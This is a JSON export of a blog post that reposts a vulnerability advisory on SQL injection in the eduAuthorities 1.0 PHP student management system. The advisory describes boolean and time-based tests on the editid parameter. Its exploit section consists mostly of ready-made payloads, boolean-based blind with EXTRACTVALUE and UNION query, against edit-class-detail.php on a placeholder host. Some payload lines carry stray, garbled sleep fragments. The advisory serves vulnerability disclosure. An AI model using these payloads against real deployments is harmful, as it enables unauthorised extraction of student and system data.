{"id":58655,"date":"2024-08-06T17:19:51","date_gmt":"2024-08-06T14:19:51","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/179919\/eduauthorities10-sql.txt"},"modified":"2024-08-06T17:19:51","modified_gmt":"2024-08-06T14:19:51","slug":"eduauthorities-1-0-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/eduauthorities-1-0-sql-injection\/","title":{"rendered":"eduAuthorities 1.0 SQL Injection"},"content":{"rendered":"<p>## Titles: eduAuthorities-1.0 Multiple-SQLi<br \/>## Author: nu11secur1ty<br \/>## Date: 07\/29\/2024<br \/>## Vendor: https:\/\/www.mayurik.com\/<br \/>## Software:<br \/>https:\/\/www.sourcecodester.com\/php\/16137\/online-student-management-system-php-free-download.html<br \/>## Reference: https:\/\/portswigger.net\/web-security\/sql-injection<\/p>\n<p>## Description:<br \/>The editid parameter appears to be vulnerable to SQL injection attacks. The<br \/>payloads 15750083 or 4189=04189 and 58006253 or 7709=7710 were each<br \/>submitted in the editid parameter. These two requests resulted in different<br \/>responses, indicating that the input is being incorporated into a SQL query<br \/>in an unsafe way. Note that automated difference-based tests for SQL<br \/>injection flaws can often be unreliable and are prone to false positive<br \/>results. You should manually review the reported requests and responses to<br \/>confirm whether a vulnerability is actually present.<br \/>Additionally, the payload (select*from(select(sleep(20)))a) was submitted<br \/>in the editid parameter. The application took 20011 milliseconds to respond<br \/>to the request, compared with 3 milliseconds for the original request,<br \/>indicating that the injected SQL command caused a time delay.The attacker<br \/>can get all information from the system by using this vulnerability!<\/p>\n<p>STATUS: HIGH- Vulnerability<\/p>\n[+]Exploits:<br \/>&#8211; SQLi Multiple:<br \/>&#8220;`mysql<br \/>&#8212;<br \/>Parameter: #1* (URI)<br \/>Type: boolean-based blind<br \/>Title: MySQL OR boolean-based blind &#8211; WHERE, HAVING, ORDER BY or GROUP<br \/>BY clause (EXTRACTVALUE)<br \/>Payload: http:\/\/pwnedhost.com\/eduauth\/edit-class-detail.php?editid=-8488<br \/>OR EXTRACTVALUE(2229,CASE WHEN (2229=2229) THEN 2229 ELSE 0x3A END)#<br \/>UiVZfrom(select(sleep(3)))a)<\/p>\n<p>Type: UNION query<br \/>Title: MySQL UNION query (random number) &#8211; 3 columns<br \/>Payload: http:\/\/pwnedhost.com\/eduauth\/edit-class-detail.php?editid=-2962<br \/>UNION ALL SELECT<br \/>8651,8651,CONCAT(0x7176627a71,0x664c6c4a72786a466c676743684468646d676e646d476f535a4f4a64694375516a54746d52426253,0x7171766b71),8651#from(select(sleep(3)))a)<br \/>&#8212;<br \/>&#8220;`<\/p>\n<p>## Reproduce:<br \/>[href](https:\/\/www.patreon.com\/posts\/eduauthorities-1-109562178)<\/p>\n<p>## More:<br \/>[href](<br \/>https:\/\/www.nu11secur1ty.com\/2024\/08\/eduauthorities-10-multiple-sqli.html)<\/p>\n<p>## Time spent:<br \/>00:37:00<\/p>\n","protected":false},"excerpt":{"rendered":"<p>## Titles: eduAuthorities-1.0 Multiple-SQLi## Author: nu11secur1ty## Date: 07\/29\/2024## Vendor: https:\/\/www.mayurik.com\/## Software:https:\/\/www.sourcecodester.com\/php\/16137\/online-student-management-system-php-free-download.html## Reference: https:\/\/portswigger.net\/web-security\/sql-injection ## Description:The editid parameter appears to be vulnerable to SQL injection attacks. Thepayloads 15750083 or 4189=04189 and 58006253 or 7709=7710 were eachsubmitted in the editid parameter. These two requests resulted in differentresponses, indicating that the input is being incorporated into a SQL &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-58655","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58655","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=58655"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58655\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=58655"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=58655"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=58655"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}